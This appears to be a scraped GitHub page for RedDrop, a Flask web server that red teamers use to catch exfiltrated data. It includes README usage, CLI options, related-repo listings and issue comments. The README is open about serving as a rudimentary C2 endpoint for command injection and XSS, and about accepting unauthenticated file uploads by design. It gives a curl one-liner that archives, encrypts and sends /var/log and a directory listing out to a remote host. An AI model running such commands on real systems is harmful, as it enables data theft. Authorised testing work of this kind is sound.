RedDrop is a quick and easy web server for capturing and processing encoded and encrypted payloads and tar archives.

Overview

Red Drop

RedDrop Exfil Server

Check out the accompanying MaverisLabs Blog Post Here!

RedDrop Exfil Server is a Python Flask Web Server for Penetration Testers, Red Teamers, and Security Professionals which features:

This software is intended to be used as an a rudementary C2 endpoint for capturing web request data in various scenarios. Some examples may include:

  • A blind command injection vulnerability
  • An XSS attack where a quick and dynamic web request logging server is needed
  • A situation where remote shell access has been obtained and a verbose-logging web-based exfiltration server is desired

Demo

Demo

This project is still in development and some features may be buggy. If you run into problems, please open an Issue!

A note on security

This software should not be left generally accessible to the broader Internet. It is built with what some might consider an Arbitrary File Upload vulnerability by intention, and will accept and save files to the local disk without authentication. Due diligence should be taken to ensure that the system this software is deployed to is secured properly. A few recommendations:

  • Utilize the Authorization Rules feature of RedDrop to drop requests which do not meet your criteria.
  • Place a Reverse Proxy to route and block traffic to this web application
  • Whitelist your target's IP space
  • Don't auto extract archives without understanding my filtering method

Quick Start

Docker

mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

Options

python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

Examples

Exfiltrating a Tar archive and command output from a Linux system

tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

Todo

  • Greater documentation of techniques using this web server
  • Chunked File Upload handling and example commands
  • More Processing modules
  • Expand archive extraction functionality
You might also like...
Encrypted Python Password Manager

PyPassKeep Encrypted Python Password Manager About PyPassKeep (PPK for short) is an encrypted python password manager used to secure your passwords fr

PoC encrypted diary in Python 3

Encrypted diary Sample program to store confidential data. Provides encryption in the form of AES-256 with bcrypt KDF. Does not provide authentication

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit relays only.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit re

A quick script to spot the usage of Unicode Bidi (bidirectional) characters that could lead to an Invisible Backdoor
A quick script to spot the usage of Unicode Bidi (bidirectional) characters that could lead to an Invisible Backdoor

Invisible Backdoor Detector is a little Python script that allows you to spot and remove Bidi characters that could lead to an invisible backdoor. If you don't know what that is you should check the related paragraph.

A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities

Shodan Quick Recon A Python Tool that uses Shodan API's to perform quick recon for vulnerabilities Configuration You must edit the python code, and in

Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures
Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures

Suricata Language Server is an implementation of the Language Server Protocol for Suricata signatures. It adds syntax check, hints and auto-completion to your preferred editor once it is configured.

A simple Outline Server Access Key Copy and Paste Web Interface

Outline Keychain A simple Outline Server Access Key Copy and Paste Web Interface Developed for key and password export and copy & paste for other Shad

SonicWALL SSL-VPN Web Server Vulnerable Exploit
SonicWALL SSL-VPN Web Server Vulnerable Exploit

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Comments
  • unknown shorthand flag: 'n' in -n

    unknown shorthand flag: 'n' in -n

    Using your command: docker run -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" -n reddrop cyberbutler/reddrop-exfil-server -h Error: unknown shorthand flag: 'n' in -n

    Replacing -n for --name New error: docker run -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop-exfil-server -h

    Unable to find image 'cyberbutler/reddrop-exfil-server:latest' locally docker: Error response from daemon: pull access denied for cyberbutler/reddrop-exfil-server, repository does not exist or may require 'docker login': denied: requested access to the resource is denied. See 'docker run --help'.

    bug documentation 
    opened by 0xVIC 1
  • Changed Production Server to Gunicorn for TLS Support

    Changed Production Server to Gunicorn for TLS Support

    Waitress does not offer TLS support out of the box, and to avoid users having to set up their own Reverse Proxy, I decided to instead change the production server to gunicorn.

    opened by cyberbutler 0
  • Data tagging - Suggested by @SecurityWard

    Data tagging - Suggested by @SecurityWard

    @SecurityWard suggested adding Data Tagging for filtering logs and files at a later time. This PR adds functionality where Tags are applied to each request which passes any authorization rules (when specified). In the case of file upload, a new directory will be created under the configured upload_dir with a name of each tag joined by a - character.

    Example: image

    opened by cyberbutler 0
Owner
Twitter: thecyberbutler
null
IDA plugin for quickly copying disassembly as encoded hex bytes

HexCopy IDA plugin for quickly copying disassembly as encoded hex bytes. This whole plugin just saves you two extra clicks... but if you are frequentl

OALabs 46 Oct 30, 2022
Keystroke logging, often referred to as keylogging or keyboard capturing

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording the keys struck on a keyboard, typically covertly, so that a person using the keyboard is unaware that their actions are being monitored.

Harsha G 2 Jan 11, 2022
Log4j exploit catcher, detect Log4Shell exploits and try to get payloads.

log4j_catcher Log4j exploit catcher, detect Log4Shell exploits and try to get payloads. This is a basic python server that listen on a port and logs i

EntropyQueen 17 Dec 20, 2021
Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems

KCMTicketFormatter This tools takes the output from https://github.com/fireeye/SSSDKCMExtractor and turns it into properly formatted CCACHE files for

Black Lantern Security 35 Oct 25, 2022
This tool allows to automatically test for Content Security Policy bypass payloads.

CSPass This tool allows to automatically test for Content Security Policy bypass payloads. Usage [cspass]$ ./cspass.py -h usage: cspass.py [-h] [--no-

Ruulian 30 Nov 22, 2022
Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.

Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.

Astro 9 Sep 27, 2022
Deobfuscate Log4Shell payloads with ease

Ox4Shell Deobfuscate Log4Shell payloads with ease. Description Since the release

Oxeye 137 Jan 2, 2023
HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

HatSploit collection of generic payloads designed to provide a wide range of attacks without having to spend time writing new ones.

EntySec 5 May 10, 2022
Add a Web Server based on Rogue Mysql Server to allow remote user get

介绍 对于需要使用 Rogue Mysql Server 的漏洞来说,若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本 不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-

null 6 May 17, 2022
NFC Implant-base RSA Encrypted Messagging application

Encrypted messaging application with the use of MIFARE DESfire chip to store the private/public keys needed for the application authentication

null 4 Nov 6, 2021